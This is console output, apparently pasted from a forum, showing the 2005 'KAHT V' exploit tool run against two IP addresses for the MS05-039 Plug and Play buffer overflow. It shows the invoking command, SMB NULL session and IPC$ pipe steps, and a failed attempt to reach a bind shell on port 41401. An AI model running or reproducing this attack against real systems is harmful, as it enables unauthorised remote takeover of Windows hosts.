e:kahtv.exe 192.167.10.54 192.167.10.55
_________________________________________________
KAHT V - Plug&Play Remote Buffer Overflow (ms05039)
Bassed on houseofdabus exploit
Haxorcitos 2005 Š
________________________________________________
[+] Targets: 192.167.10.54-192.167.10.55 with 50 Threads
[+] Attacking Port: 445. Remote Shell at port: 41401
[+] Scan In Progress...
[+] Connected to 192.167.10.55 ...
[+] Negociando NULL Session con 192.167.10.55 ...
[+] bind pipe with 192.167.10.55IPC$...
[+] Exploit Sent to 192.167.10.55. Connecting to bindshell at port 41401...
[-] exploit at 192.167.10.55 FAILED (41401)
[+] Scan Finished. Found 1 open ports
E:>[/b]